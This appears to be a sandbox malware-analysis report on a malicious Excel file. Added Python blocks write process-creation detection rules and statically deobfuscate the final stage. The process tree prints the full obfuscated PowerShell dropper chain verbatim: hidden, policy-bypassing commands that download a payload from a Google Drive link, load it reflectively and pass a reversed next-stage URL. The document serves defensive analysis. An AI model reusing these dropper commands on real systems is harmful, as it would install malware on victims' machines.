
Analysis

  • max time kernel
    101s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags
    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    07/11/2024, 03:18

General

  • Target

    d42ff478f1996a591e02f59a41edda8aee486e9523c14bce04be51cb457cc6e6.xls

  • Size

    1.1MB

  • MD5

    9b8d94907c2db1b8ae9ebf84b2099c16

  • SHA1

    d543e02897263288f2b2a65d7070757d99fed8ff

  • SHA256

    d42ff478f1996a591e02f59a41edda8aee486e9523c14bce04be51cb457cc6e6

  • SHA512

    cc8d24cee7a41c7cc2ddab9cd5d7ae6b245dcd90fee8b5de1d4001dae83e7c43d3cbd474bc1c4f89fa9ec903d26de680630d8b064328f07b3a04cf827182a972

  • SSDEEP

    24576:1yaZxvseowaDI9eqvBw2LyifZSScF1LelExbgwCcH0p1O4uGqdzkxTm:1T0DIRvBwCv0xF1L3MwCA4uIx

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated URLs
    ps1.dropper
    https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
    exe.dropper
    https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell with its display window hidden.

  • Evasion via Device Credential Deployment 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
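
The signatures above can be approximated with a handful of process-creation rules. The block below is an added example, not tria.ge's signature logic: it runs such rules over events reconstructed from the Processes section of this report. The event records, the parent PIDs (taken from the tree nesting, None where the report shows the process at top level) and the rule names are mine, and long script bodies are shortened to "...".

```python
"""Process-creation rules for the behaviour chain in this report.
Added example; not tria.ge's own signature logic."""
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class ProcEvent:
    pid: int
    ppid: Optional[int]   # None where the report shows no parent
    image: str
    cmdline: str


# Constructed from the Processes section of this report: PIDs, images and
# command lines as printed there (long script bodies shortened to "..."),
# parent PIDs taken from the tree nesting.
EVENTS = [
    ProcEvent(840, None, r"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE",
              r'"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\d42ff478f1996a591e02f59a41edda8aee486e9523c14bce04be51cb457cc6e6.xls'),
    ProcEvent(2540, None, r"C:\Windows\SysWOW64\mshta.exe", r"C:\Windows\SysWOW64\mshta.exe -Embedding"),
    ProcEvent(2428, 2540, r"C:\Windows\SysWOW64\WiNdowSpOWerShelL\v1.0\POWErsHell.eXE",
              r'''"C:\Windows\SYsTEM32\WiNdowSpOWerShelL\v1.0\POWErsHell.eXE" "pOWErsheLl.exE -EX BypaSS -NOp -w 1 -C DeVIcecRedentiaLDepLoYmENT.eXE ; IeX($(IEx('[syStEm.tEXt.ENcoDing]'+[ChaR]58+[char]58+'Utf8.getStRInG([SYStEm.CONVERT]'+[CHaR]0x3a+[cHaR]0x3A+'fROmbASe64stRinG('+[cHar]0x22+'...'+[ChAr]34+'))')))"'''),
    ProcEvent(2652, 2428, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BypaSS -NOp -w 1 -C DeVIcecRedentiaLDepLoYmENT.eXE'),
    ProcEvent(1636, 2428, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xnxpjgur.cmdline"'),
    ProcEvent(1932, 1636, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe",
              r'C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5BF6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5BE6.tmp"'),
    ProcEvent(1724, 2428, r"C:\Windows\SysWOW64\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodnewsgivenmegreatw.vbs"'),
    ProcEvent(964, 1724, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '...';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD'''),
    ProcEvent(1512, 964, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pshoME[21]+$PshoMe[34]+'x')( ('7z'+'ximageUrl = K9khttps://driv'+...).REplaCE('7zx','$') )"'''),
]

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe"}

# -w 1 / -windowstyle hidden, and -ex / -ep / -executionpolicy bypass, in any casing
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I)
BYPASS = re.compile(r"-e(?:x|p|xecutionpolicy)?\s+bypass\b", re.I)
# [char] casts, $PSHOME character indexing, or inline base64 decoding
OBFUSC = re.compile(r"\[char\]|\$pshome\[|frombase64string", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(ev: ProcEvent, parent: Optional[ProcEvent]) -> list:
    """Return the names of every rule the event (with its parent) matches."""
    name, cmd = basename(ev.image), ev.cmdline
    pname = basename(parent.image) if parent else None
    hits = []
    if pname in OFFICE and name in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    # COM-activated mshta: no script path or URL on the command line at all
    if name == "mshta.exe" and "-embedding" in cmd.lower() and not re.search(r"\.hta\b|https?://", cmd, re.I):
        hits.append("mshta_com_activated")
    if name == "powershell.exe" and HIDDEN.search(cmd) and BYPASS.search(cmd):
        hits.append("powershell_hidden_bypass")
    if name == "powershell.exe" and OBFUSC.search(cmd):
        hits.append("powershell_obfuscation")
    # PowerShell driving csc.exe is the Add-Type / in-memory compile pattern
    if pname == "powershell.exe" and name == "csc.exe":
        hits.append("powershell_compiles_csharp")
    if name in {"wscript.exe", "cscript.exe"} and re.search(r"\\appdata\\roaming\\", cmd, re.I):
        hits.append("script_host_from_roaming")
    return hits


def detect(events: list) -> list:
    """Run every rule over every event; returns (pid, rule) pairs in event order."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        parent = by_pid.get(ev.ppid) if ev.ppid is not None else None
        alerts.extend((ev.pid, rule) for rule in evaluate(ev, parent))
    return alerts


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule)
```

Note what the parent-child Office rule does not catch here: mshta.exe runs with -Embedding, which is a COM activation, and the report shows it at top level rather than under EXCEL.EXE. A rule keyed on "Office spawns a script host" is silent for this chain; the mshta_com_activated rule, the hidden-window/bypass PowerShell rule and the PowerShell-to-csc.exe rule are what fire.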

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\d42ff478f1996a591e02f59a41edda8aee486e9523c14bce04be51cb457cc6e6.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:840
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2540
    • C:\Windows\SysWOW64\WiNdowSpOWerShelL\v1.0\POWErsHell.eXE
      "C:\Windows\SYsTEM32\WiNdowSpOWerShelL\v1.0\POWErsHell.eXE" "pOWErsheLl.exE -EX BypaSS -NOp -w 1 -C DeVIcecRedentiaLDepLoYmENT.eXE ; IeX($(IEx('[syStEm.tEXt.ENcoDing]'+[ChaR]58+[char]58+'Utf8.getStRInG([SYStEm.CONVERT]'+[CHaR]0x3a+[cHaR]0x3A+'fROmbASe64stRinG('+[cHar]0x22+'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'+[ChAr]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2428
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BypaSS -NOp -w 1 -C DeVIcecRedentiaLDepLoYmENT.eXE
        3⤵
        • Evasion via Device Credential Deployment
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2652
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xnxpjgur.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1636
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5BF6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5BE6.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1932
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodnewsgivenmegreatw.vbs"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1724
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzaG9NRVsyMV0rJFBzaG9NZVszNF0rJ3gnKSggKCc3eicrJ3hpbWFnZVVybCA9IEs5a2h0dHBzOi8vZHJpdicrJ2UuZ29vZ2xlLmNvbS91Yz9leHBvcnQnKyc9ZG93bmxvYWQmaWQ9MVV5SHF3cm5YQ2xLQkozajYzTGwxdDJTdFZnR3hiU3QwIEs5azs3eicrJ3h3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OZXQuJysnV2ViQ2xpZW50Ozd6eGknKydtYWdlQnl0JysnZXMgPSA3eicrJ3h3ZWJDbGllbnQuRG93bmxvYWREYXRhKDd6eGltYWdlVXJsKTs3enhpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg3enhpbWFnZUJ5dGVzKTs3enhzdGFydEZsYWcgPSBLOWs8PEJBU0U2NF9TVEFSVD4+SzlrOzd6eGUnKyduZEZsYWcgPSBLOWs8PEJBU0U2NF9FTkQ+Pks5azs3enhzdGFydEluZGV4ID0gN3p4aW1hZ2VUZXh0LkluZGV4T2YoN3p4c3RhcnRGbGFnKTsnKyc3enhlbmRJbmRleCA9IDd6eGltYWdlVGV4dC5JbmRleE9mKDd6JysneGVuZEZsYWcpOzd6eHN0YXJ0SW5kZXggLWcnKydlIDAgLWFuZCA3JysnenhlbmRJbicrJ2RleCAtZ3QgN3onKyd4c3RhcnRJbmQnKydleDs3enhzdGFydEluZGV4ICs9IDd6eHN0YXJ0RmxhZy5MZW5ndGg7N3p4YmFzZTYnKyc0TGVuZ3RoID0gN3p4ZW5kJysnSW5kZXggLSA3enhzdGFydEluZCcrJ2UnKyd4Ozd6eGJhc2U2NENvbW1hbmQnKycgPSA3enhpbWFnZVQnKydleHQuU3Vic3RyaW5nKDd6eHN0YXJ0SW5kZXgsJysnIDd6eGJhc2U2NExlbmd0aCk7N3p4YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoN3p4YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGFDeCBGb3JFYWNoLU9iamVjdCB7IDd6eF8gfSknKydbLTEuLi0oN3p4YmFzZTY0Q29tbWFuZC5MZScrJ25ndGgpXTs3enhjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDd6JysneGJhc2U2NFJldmVyc2VkKTs3enhsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdCcrJ2lvbi5Bc3NlbWJseV06OicrJ0xvYWQoN3p4Y29tbWFuZEJ5dGVzKTs3enh2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKEs5a1ZBSUs5ayk7N3p4dmFpTWV0aG9kLkludm9rZSg3enhudWxsLCBAKEs5a3R4dC5SUklNTUEnKydDLzcxMi82NDEuMzkxLjMuMjkxLy86cCcrJ3R0aEs5aywgSzlrZGVzYXRpdmFkb0s5aywgSzlrZGVzYXRpdmFkJysnb0s5aywgSzlrZGVzYXRpdmFkb0s5aywgSzlrYXNwbmV0X2NvbXBpbGVySzlrLCBLOWtkZXNhdGl2YWRvSzlrLCAnKydLOWtkJysnZXNhdGl2YWRvSzlrLEs5a2Rlc2F0aXZhZG9LOWssSzknKydrZGVzYScrJ3RpdmFkb0s5ayxLOWtkZXNhdGl2YWQnKydvSzlrLEs5a2Rlc2F0aXZhZG9LOWssSzlrZGUnKydzYXRpdmFkb0s5ayxLOWsxSzlrLEs5a2Rlc2F0aXZhZG9LOWspKTsnKS5SRXBsYUNFKCdhQ3
gnLFtTVFJJbmddW0NIQVJdMTI0KS5SRXBsYUNFKChbQ0hBUl03NStbQ0hBUl01NytbQ0hBUl0xMDcpLFtTVFJJbmddW0NIQVJdMzkpLlJFcGxhQ0UoJzd6eCcsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:964
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pshoME[21]+$PshoMe[34]+'x')( ('7z'+'ximageUrl = K9khttps://driv'+'e.google.com/uc?export'+'=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 K9k;7z'+'xwebClient = New-Object Sys'+'tem.Net.'+'WebClient;7zxi'+'mageByt'+'es = 7z'+'xwebClient.DownloadData(7zximageUrl);7zximageText = [System.Text.Encoding]::UTF8.GetString(7zximageBytes);7zxstartFlag = K9k<<BASE64_START>>K9k;7zxe'+'ndFlag = K9k<<BASE64_END>>K9k;7zxstartIndex = 7zximageText.IndexOf(7zxstartFlag);'+'7zxendIndex = 7zximageText.IndexOf(7z'+'xendFlag);7zxstartIndex -g'+'e 0 -and 7'+'zxendIn'+'dex -gt 7z'+'xstartInd'+'ex;7zxstartIndex += 7zxstartFlag.Length;7zxbase6'+'4Length = 7zxend'+'Index - 7zxstartInd'+'e'+'x;7zxbase64Command'+' = 7zximageT'+'ext.Substring(7zxstartIndex,'+' 7zxbase64Length);7zxbase64Reversed = -join (7zxbase64Command.ToCharArray() aCx ForEach-Object { 7zx_ })'+'[-1..-(7zxbase64Command.Le'+'ngth)];7zxcommandBytes = [System.Convert]::FromBase64String(7z'+'xbase64Reversed);7zxloadedAssembly = [System.Reflect'+'ion.Assembly]::'+'Load(7zxcommandBytes);7zxvaiMethod = [dnlib.IO.Home].GetMethod(K9kVAIK9k);7zxvaiMethod.Invoke(7zxnull, @(K9ktxt.RRIMMA'+'C/712/641.391.3.291//:p'+'tthK9k, K9kdesativadoK9k, K9kdesativad'+'oK9k, K9kdesativadoK9k, K9kaspnet_compilerK9k, K9kdesativadoK9k, '+'K9kd'+'esativadoK9k,K9kdesativadoK9k,K9'+'kdesa'+'tivadoK9k,K9kdesativad'+'oK9k,K9kdesativadoK9k,K9kde'+'sativadoK9k,K9k1K9k,K9kdesativadoK9k));').REplaCE('aCx',[STRIng][CHAR]124).REplaCE(([CHAR]75+[CHAR]57+[CHAR]107),[STRIng][CHAR]39).REplaCE('7zx','$') )"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1512
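
The last PowerShell stage above (PID 1512) is the $Codigo base64 from PID 964 decoded to UTF-8, and it is still obfuscated: the command is run through an alias built from $PSHOME characters, the script is a chain of single-quoted fragments joined with '+', and three .REplaCE() calls swap placeholder tokens back into the characters |, ' and $. The block below is an added static deobfuscator for that shape; it is not tria.ge's code nor anything from the sample. SAMPLE is the -command argument of PID 1512 copied from the tree; the $PSHOME path is an assumption (the SysWOW64 variant is the same length, so the indexed characters are the same); every function name is mine. Nothing is executed.

```python
"""Static deobfuscation of the final PowerShell stage (PID 1512) from the
process tree above.  Added example; not code from tria.ge or from the sample."""
import re

# $PSHOME on the sandbox image (assumed).  The SysWOW64 path has the same length,
# so $PSHOME[21] and $PSHOME[34] resolve to the same characters either way.
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"

# The -command argument of PID 1512, copied from the process tree.
SAMPLE = r""".( $pshoME[21]+$PshoMe[34]+'x')( ('7z'+'ximageUrl = K9khttps://driv'+'e.google.com/uc?export'+'=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 K9k;7z'+'xwebClient = New-Object Sys'+'tem.Net.'+'WebClient;7zxi'+'mageByt'+'es = 7z'+'xwebClient.DownloadData(7zximageUrl);7zximageText = [System.Text.Encoding]::UTF8.GetString(7zximageBytes);7zxstartFlag = K9k<<BASE64_START>>K9k;7zxe'+'ndFlag = K9k<<BASE64_END>>K9k;7zxstartIndex = 7zximageText.IndexOf(7zxstartFlag);'+'7zxendIndex = 7zximageText.IndexOf(7z'+'xendFlag);7zxstartIndex -g'+'e 0 -and 7'+'zxendIn'+'dex -gt 7z'+'xstartInd'+'ex;7zxstartIndex += 7zxstartFlag.Length;7zxbase6'+'4Length = 7zxend'+'Index - 7zxstartInd'+'e'+'x;7zxbase64Command'+' = 7zximageT'+'ext.Substring(7zxstartIndex,'+' 7zxbase64Length);7zxbase64Reversed = -join (7zxbase64Command.ToCharArray() aCx ForEach-Object { 7zx_ })'+'[-1..-(7zxbase64Command.Le'+'ngth)];7zxcommandBytes = [System.Convert]::FromBase64String(7z'+'xbase64Reversed);7zxloadedAssembly = [System.Reflect'+'ion.Assembly]::'+'Load(7zxcommandBytes);7zxvaiMethod = [dnlib.IO.Home].GetMethod(K9kVAIK9k);7zxvaiMethod.Invoke(7zxnull, @(K9ktxt.RRIMMA'+'C/712/641.391.3.291//:p'+'tthK9k, K9kdesativadoK9k, K9kdesativad'+'oK9k, K9kdesativadoK9k, K9kaspnet_compilerK9k, K9kdesativadoK9k, '+'K9kd'+'esativadoK9k,K9kdesativadoK9k,K9'+'kdesa'+'tivadoK9k,K9kdesativad'+'oK9k,K9kdesativadoK9k,K9kde'+'sativadoK9k,K9k1K9k,K9kdesativadoK9k));').REplaCE('aCx',[STRIng][CHAR]124).REplaCE(([CHAR]75+[CHAR]57+[CHAR]107),[STRIng][CHAR]39).REplaCE('7zx','$') )"""

# 'literal' fragments (with '' as an escaped quote) and [char]N, decimal or 0x hex
_TOKEN = re.compile(r"'((?:[^']|'')*)'|\[char\]\s*(0x[0-9a-f]+|\d+)", re.I)


def eval_ps_string(expr: str) -> str:
    """Fold an expression built from 'literals' and [char]N joined with '+'
    into one string.  Casts such as [STRIng] and parentheses carry no
    characters and are skipped."""
    out = []
    for m in _TOKEN.finditer(expr):
        if m.group(1) is not None:
            out.append(m.group(1).replace("''", "'"))
        else:
            n = m.group(2)
            out.append(chr(int(n, 16) if n.lower().startswith("0x") else int(n)))
    return "".join(out)


def _scan(text: str):
    """Yield (index, char, inside_single_quotes) so callers can skip quoted text."""
    in_q = False
    for i, c in enumerate(text):
        if c == "'":
            in_q = not in_q
        yield i, c, in_q


def _top_level_calls(text: str, needle: str = ".replace(") -> list:
    """Offsets of needle outside single-quoted literals, case-insensitive."""
    low = text.lower()
    return [i for i, _, in_q in _scan(text) if not in_q and low.startswith(needle, i)]


def _matching_paren(text: str, open_idx: int) -> int:
    depth = 0
    for i, c, in_q in _scan(text[open_idx:]):
        if in_q:
            continue
        if c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
            if depth == 0:
                return open_idx + i
    raise ValueError("unbalanced parentheses")


def _split_args(text: str) -> list:
    args, cur, depth = [], [], 0
    for _, c, in_q in _scan(text):
        if not in_q:
            if c == "(":
                depth += 1
            elif c == ")":
                depth -= 1
            elif c == "," and depth == 0:
                args.append("".join(cur))
                cur = []
                continue
        cur.append(c)
    args.append("".join(cur))
    return args


def decode_string_expr(expr: str) -> str:
    """Evaluate  ( 'a'+'b'+... ).Replace(x, y).Replace(...)  without running it."""
    calls = _top_level_calls(expr)
    value = eval_ps_string(expr[: calls[0]] if calls else expr)
    for pos in calls:
        open_idx = pos + len(".replace")
        close_idx = _matching_paren(expr, open_idx)
        args = _split_args(expr[open_idx + 1 : close_idx])
        if len(args) != 2:
            raise ValueError(f"unexpected Replace() arity: {args}")
        old, new = (eval_ps_string(a) for a in args)
        value = value.replace(old, new)   # String.Replace is ordinal, like str.replace
    return value


def resolve_alias(expr: str) -> str:
    """Rebuild a cmdlet name spelled as $PSHOME[i] characters plus literals."""
    parts = []
    for m in re.finditer(r"\$pshome\[(\d+)\]|'([^']*)'", expr, re.I):
        parts.append(PSHOME[int(m.group(1))] if m.group(1) is not None else m.group(2))
    return "".join(parts)


def extract_indicators(script: str) -> dict:
    literals = re.findall(r"'([^']*)'", script)
    invoke = re.search(r"\.Invoke\(\$null,\s*@\((.*?)\)\)", script)
    return {
        "urls": re.findall(r"https?://[^\s'\"]+", script),
        # literals that only become an http URL once reversed
        "reversed_urls": [s[::-1] for s in literals if s[::-1].startswith("http")],
        "reflection": re.findall(r"\[([\w.]+)\]\.GetMethod\('([^']*)'\)", script),
        "markers": re.findall(r"<<[A-Z0-9_]+>>", script),
        "invoke_args": re.findall(r"'([^']*)'", invoke.group(1)) if invoke else [],
    }


def analyse(command: str):
    """Split  .( <alias> )( <string expr> )  into (invoker, script, indicators)."""
    m = re.match(r"\s*\.\(\s*(.*?)\)\s*\((.*)\)\s*$", command, re.S)
    if not m:
        raise ValueError("command is not of the form .( alias )( payload )")
    invoker = resolve_alias(m.group(1))
    script = decode_string_expr(m.group(2))
    return invoker, script, extract_indicators(script)


if __name__ == "__main__":
    invoker, script, ind = analyse(SAMPLE)
    print(invoker)   # iex
    print(script)
    for key, val in ind.items():
        print(key, val)
```

Running it shows the alias is iex and the placeholders aCx, K9k and 7zx stand for |, ' and $. The recovered script downloads the Google Drive file already listed under Malware Config, cuts the text between <<BASE64_START>> and <<BASE64_END>>, reverses it, base64-decodes it and feeds the bytes to [System.Reflection.Assembly]::Load, then calls [dnlib.IO.Home].VAI through reflection with 14 string arguments. The first of those arguments is stored backwards; reversed it is an http:// URL to a .txt resource, which is the next-stage fetch to block and hunt for alongside the Drive URL. The "1" in position 13 and the repeated "desativado" are passed through unchanged; their meaning is inside the loaded assembly and is not recoverable from this page.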

TTP tags in the Signatures section are mapped against MITRE ATT&CK Enterprise v15.

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656

    Filesize

    1KB

    MD5

    3e652ebfb9e701d6bd515f81d762331d

    SHA1

    46cc56c7a8d342f3fa14d7ceb19b4d48a699072e

    SHA256

    9d1b4927244aa7e9cf87639c48fa5a5bea959765680f195ca6253f62792e122d

    SHA512

    a2c4859b5c6363968478851fdb4e8098535c0bcc0f6fab48252536898141d72fdf1ec4b14a1f75817bee457eaac662ce6f95be785c0745763e4f82998614a8e9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

    Filesize

    2KB

    MD5

    66b8e52f6d682ffbbb3baca244831960

    SHA1

    a6f6336d059949a32273a491a8b99832804770a3

    SHA256

    8fb788a5d531dc1bface8c316635c407b96b881a1dc65812d63e13095d784aad

    SHA512

    af041ecbc4385b6df1b0618e7b3a22de0e51c94907c053d84cd80518d18e9b8b4009f4771581e7ddf14891569054d9173a0a39fd3cc2b64a244513915fcbf92f

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

    Filesize

    1KB

    MD5

    cc0416733fe9f2211840ff355ceb5fad

    SHA1

    17b801484ecda2a3badb814e02d56b11ca768d81

    SHA256

    b0cd53b7f50a9d79caa2e78864aab2bc68d115cb35829a2b451ca653a7e26481

    SHA512

    30db6ef8a485076dca3f76848bd4e0d55e480c7b868fb03f44cd95ab381d83f36ab228acd6a97d71a5d4d0c1d9bced9e9ff9e1971314051c3f8316108bae4943

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F53EB4E574DE32C870452087D92DBEBB_2EEDDB29953A46217D3D6BE21EA36A5B

    Filesize

    471B

    MD5

    8955bb560abf515e94ca68dd87ef93b4

    SHA1

    edfe758796fd694f425d843c9d68689485743a4d

    SHA256

    e8da732b763426bd055a381d3647dc506f3c5d14fe0bf6e0b174c2365306c3c4

    SHA512

    ce74e7a1fd0b5baa6781d54dca087e81b8f9f68582ca935a40fd235510ed15ce8351561d8bda74f584a01225e63e5bcf99dd16953c8efb03064435aad7153173

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656

    Filesize

    434B

    MD5

    5f92c2caa4bcd2061af1d8656ec4ad7d

    SHA1

    72ec7878aac542fe23da4b1926c7298adf2ebd78

    SHA256

    f822c5c53c6bb3c31c7106b420ff2f717e3c4b25d5bb181d2e17ae8849886210

    SHA512

    181aa54110c84fb0f6a69d0af9df437ddbc2823a729f25b5bbf0016d6d834d6587acb3c5c70679c6dd091ac321389593fa0b944842c8f453306130e9c98b6867

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    e4f18e168d45a34999bbc72a47fb4c72

    SHA1

    32540425d1e4b040dcac255e27bba392a154528b

    SHA256

    671efce174efe9bbf2b581c14524762d36af43ce1824fae84ab6afb0970325aa

    SHA512

    12ecc1fb0619a0d499c7c9399dca467298adcbeee1fa0adb8291bd4e12af7fe3cb1df7c9b90b35655d37753f7ac62bac540f454cc4e0886f70c0ae5bef01d4fc

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    11beaa8c508c0d9b13fddeca4daaf6ab

    SHA1

    67a150ad5039dfc5145e7a20bf3346ad2be71ece

    SHA256

    6f765e3805d1cd0e5eb35b42458694c6c1b6cca6ed2e31f04f25bed6655a3d42

    SHA512

    319de834b06e57064cfe7dbea1de4c9c8df578eca45c328f25e4891f6a81fc0597dd220c920cdca6ec6ea08d9313a4def5fe6972f0aa854cfdf20ccb8e55461f

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

    Filesize

    458B

    MD5

    3006b04e64f5a2a1f7d8d4d5fe9e165f

    SHA1

    48ee99c8e4eac0950c7e284aa73c03290bfdd7da

    SHA256

    c9c77de0dd1b3a25d26685945d5cfe4bcda2002ee828d42c79e041fc10bd39f7

    SHA512

